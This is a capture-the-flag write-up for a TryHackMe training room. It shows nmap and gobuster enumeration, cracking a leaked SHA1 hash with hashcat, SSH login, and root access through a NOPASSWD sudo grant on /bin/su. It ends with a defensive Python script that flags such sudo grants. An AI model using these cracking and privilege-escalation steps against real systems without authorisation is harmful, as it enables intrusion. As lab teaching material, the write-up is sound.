7 December 2020 / TRYHACKME, CTF, EASY

# CC: Pentesting Write Up

## Overview

CC: Pen Testing is a guided room on TryHackMe providing an introduction to some of the common penetration testing tools. It's really well laid out and I recommend it to anyone starting out in penetration testing or CTF challenges. This write-up will only cover the steps for the final exam.

## Nmap

As normal, I kicked off an nmap scan to see what ports are available.

```
└──╼ $sudo nmap -sC -sV -oA initial 10.10.215.190
[sudo] password for daz:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-08 21:42 GMT
Nmap scan report for 10.10.215.190
Host is up (0.027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Two ports open:

- 22 - SSH - The banner shows it's an Ubuntu machine
- 80 - HTTP - Apache web server version 2.4.18

I also ran a full port scan but no additional ports were found.

## Enumeration

The web page displays the default Apache page. I checked the source code but everything was standard. I kicked off gobuster to see what other directories were available.

```
└──╼ $gobuster dir -u http://10.10.215.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.215.190
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/08 21:49:12 Starting gobuster
===============================================================
/secret (Status: 301)
/server-status (Status: 403)
===============================================================
2020/12/08 21:51:09 Finished
===============================================================
```

One directory was found, `/secret`; browsing to it doesn't display anything. I ran a second gobuster, this time in the secret folder, and checked for .log, .txt and .html files using the -x flag.

```
└──╼ $gobuster dir -u http://10.10.215.190/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x log,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.215.190/secret
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     log,txt,html
[+] Timeout:        10s
===============================================================
2020/12/08 21:55:16 Starting gobuster
===============================================================
/index.html (Status: 200)
/secret.txt (Status: 200)
Progress: 49450 / 220561 (22.42%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/12/08 21:59:31 Finished
===============================================================
```

## Initial Access

One additional file was found, `secret.txt`. Browsing to http://10.10.215.190/secret/secret.txt I could see the contents of the file:

```
nyan:046385855FC9580393853D8E(REDACTED)
```

The password hash looks to be SHA1. I put the hash into a file called hash.txt on my VM and ran hashcat with the command:

```
hashcat -m 100 hash.txt /usr/share/wordlists/rockyou.txt --force
```

Hashcat was successfully able to crack the hash and I was able to SSH into the machine.

## Priv Esc

Once connected via SSH I ran `sudo -l`; the user nyan is able to run the command `/bin/su` as root without providing a password. This provides a simple privesc by running `sudo su`. Other techniques like this can be found on GTFOBins.

```
nyan@ubuntu:~$ sudo -l
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
nyan@ubuntu:~$
nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/nyan#
```

Thanks for reading!

---

Any comments or feedback welcome! You can find me on twitter.
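As an added defender-side check, not part of the original write-up: the misconfiguration found with `sudo -l` in the Priv Esc section, a NOPASSWD grant on `/bin/su`, is exactly what a sudoers audit should flag. The parser below reads `sudo -l` output and rates each command grant; the `SHELL_BINARIES` list and the severity labels are my own assumptions, and the sample transcript is constructed from the one in this post with one harmless grant added for contrast.

```python
import re
from dataclasses import dataclass

# Binaries that hand the caller an interactive root shell outright. Assumed
# starter list: the write-up names /bin/su and points at GTFOBins for more.
SHELL_BINARIES = {"/bin/su", "/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh"}

# One rule line of `sudo -l` output, e.g. "    (root) NOPASSWD: /bin/su"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

@dataclass
class SudoFinding:
    runas: str
    command: str
    nopasswd: bool
    severity: str  # "critical", "high" or "info"

def classify(binary: str, nopasswd: bool) -> str:
    """Rate one grant: a shell binary (or ALL) is critical without a password."""
    if binary == "ALL" or binary in SHELL_BINARIES:
        return "critical" if nopasswd else "high"
    return "info"

def audit_sudo_l(output: str) -> "list[SudoFinding]":
    """Parse the rule lines that follow 'may run the following commands'."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD" in re.findall(r"[A-Z_]+(?=:)", m.group("tags"))
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if cmd:  # skip an empty trailing item after a stray comma
                sev = classify(cmd.split()[0], nopasswd)  # rate the binary, not its args
                findings.append(SudoFinding(m.group("runas"), cmd, nopasswd, sev))
    return findings

# Constructed sample: the transcript from this write-up plus one harmless grant.
SAMPLE_SUDO_L = """Matching Defaults entries for nyan on ubuntu:
User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{f.severity:8} runas={f.runas} nopasswd={f.nopasswd} {f.command}")
```

Run it against the real output of `sudo -l` on a host (or against `/etc/sudoers` rendered through `sudo -l -U <user>`) to list the grants that need a password requirement restored or the binary swapped for something that cannot spawn a shell.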